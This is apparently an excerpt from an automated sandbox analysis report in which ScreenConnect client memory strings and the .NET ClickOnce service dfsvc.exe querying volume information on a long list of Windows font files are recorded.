                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1412836393.0000000000512000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1412836393.0000000000512000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
